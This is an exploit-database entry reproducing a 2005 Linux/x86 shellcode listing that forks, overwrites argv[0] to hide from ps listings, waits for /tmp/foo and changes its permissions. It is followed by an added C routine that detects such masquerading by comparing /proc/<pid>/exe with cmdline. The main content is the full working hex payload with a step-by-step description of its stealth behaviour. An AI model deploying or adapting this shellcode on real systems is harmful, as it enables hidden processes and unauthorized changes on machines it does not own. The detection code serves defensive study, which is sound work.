Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)

Vulnerability ID: 1055377
Vulnerability type:
Published: 2005-09-08
Updated: 2005-09-08
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux_x86
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13411
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
/*----------------------------------------------------------------------------*
 *          [Mystique Project: Examples of long-term payloads]                *
 *                       hide-wait-change code                                *
 *                 by [email protected]  &  [email protected]                       *
 *----------------------------------------------------------------------------*
 * This code, upon execution, will perform the following things...            *
 *                                                                            *
 *   1) Fork a new process, and kill PPID via _exit() so we get inherited     *
 *      by init and now have a new PID.                                       *
 *   2) Will obtain the current location of argv[0] by retrieving information *
 *      from /proc/self/stat.                                                 *
 *   3) Copy the name we wish to masquerade as into argv[0] in memory.        *
 *   4) Call setsid() to establish ourselves as a process leader.             *
 *   5) Will sleep via nanosleep() for a given interval of time.              *
 *   6) Will check to see if a file exists via access().                      *
 *   7) If it does not, loop back to step 5                                   *
 *   8) If it does then we chmod() the file with permissions 0455.            *
 *   9) Calls _exit()                                                         *
 *                                                                            *
 *  * steps 3-4 effectively hide us from most ps-listings                     *
 *                                                                            *
 *   size: 187 + strlen(new-proc-name) + strlen(file-to-change)               *
 *----------------------------------------------------------------------------*/
	
char shellcode[]=
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x79\x31\xc0\x40\xcd\x80\x5b\x8d"
"\x73\x10\xfe\x43\x0f\x99\x31\xc9\xb0\x05\xcd\x80\x93\x6a\x03\x58"
"\xb2\xfa\x89\xe1\x29\xd1\xcd\x80\x89\xcf\x01\xc7\x93\xfd\x6a\x20"
"\x58\x6a\x0e\x59\x87\xcb\xf2\xae\x87\xcb\xe2\xf8\x47\x47\x31\xc0"
"\x6a\x0a\x5b\xfc\x31\xd2\x8a\x0f\x83\xe9\x30\x01\xc8\x47\x80\x3f"
"\x20\x74\x04\xf7\xe3\xeb\xed\x94\x5f\x5f\x94\x57\xb1\xff\x31\xc0"
"\xf3\xaa\x5f\x56\x4e\x46\x41\x80\x3e\xff\x75\xf9\xfe\x06\x5e\xf3"
"\xa4\xb0\x42\xcd\x80\x89\xf7\x92\x48\x89\xc1\xf2\xae\xfe\x47\xff"
"\xff\xe7\xe8\x87\xff\xff\xff"
"/proc/self/stat\xff"                       // stat file read in step 2
"xort and izik rocks the linux box\xff"     // new proc name
"/tmp/foo\xff"                              // file to chmod
"\x6a"                                      // push imm8 (operand follows)
"\x03"                                      // sleep-time
"\x40\x89\xe1\x89\xe3\x34\xa2\xcd\x80\x31\xc9\x89\xf3\x34\x21\xcd"
"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80";

// milw0rm.com [2005-09-08]
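
The argv[0] overwrite in step 3 changes only what /proc/<pid>/cmdline (and therefore a default ps listing) shows; the /proc/<pid>/exe link is kept by the kernel and is not affected. The C check below is an added example, not part of the original listing, that flags that mismatch; the function names and the path /usr/sbin/exampled are illustrative assumptions, and the result is a heuristic, since daemons that set a process title and binaries started through symlinks also differ.

```c
/* Added example (not from the original listing): kernel-held exe vs. argv[0]. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Last path component of a NUL-terminated string. */
static const char *base(const char *p) {
    const char *s = strrchr(p, '/');
    return s ? s + 1 : p;
}

/* exe: target of the /proc/<pid>/exe symlink. cmdline/len: raw bytes of
 * /proc/<pid>/cmdline (NUL-separated argv). Returns 1 on a mismatch. */
int argv0_mismatch(const char *exe, const char *cmdline, size_t len) {
    char e[256], a[256];
    if (len == 0) return 0;                      /* kernel thread: nothing to compare */
    snprintf(e, sizeof e, "%s", base(exe));
    char *del = strstr(e, " (deleted)");         /* binary unlinked after exec */
    if (del) *del = '\0';
    const char *nul = memchr(cmdline, 0, len);   /* argv[0] ends at the first NUL */
    size_t n = nul ? (size_t)(nul - cmdline) : len;
    snprintf(a, sizeof a, "%.*s", (int)n, cmdline);
    const char *name = base(a);
    if (*name == '-') name++;                    /* login shells run as "-bash" */
    return strcmp(name, e) != 0;
}

/* Live check of one PID; -1 if its /proc entries cannot be read. */
int check_pid(int pid) {
    char path[64], exe[256], cmd[4096];
    snprintf(path, sizeof path, "/proc/%d/exe", pid);
    ssize_t n = readlink(path, exe, sizeof exe - 1);
    if (n < 0) return -1;
    exe[n] = '\0';
    snprintf(path, sizeof path, "/proc/%d/cmdline", pid);
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t len = fread(cmd, 1, sizeof cmd, f);
    fclose(f);
    return argv0_mismatch(exe, cmd, len);
}

int main(void) {
    /* Constructed sample: argv[0] rewritten as in step 3; exe path is hypothetical. */
    static const char hidden[] = "xort and izik rocks the linux box";
    int sample = argv0_mismatch("/usr/sbin/exampled", hidden, sizeof hidden);
    printf("sample=%d self=%d\n", sample, check_pid((int)getpid()));
    return 0;
}
```

Run it over every numeric directory in /proc and review the hits against an allow-list of known title-setting daemons.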
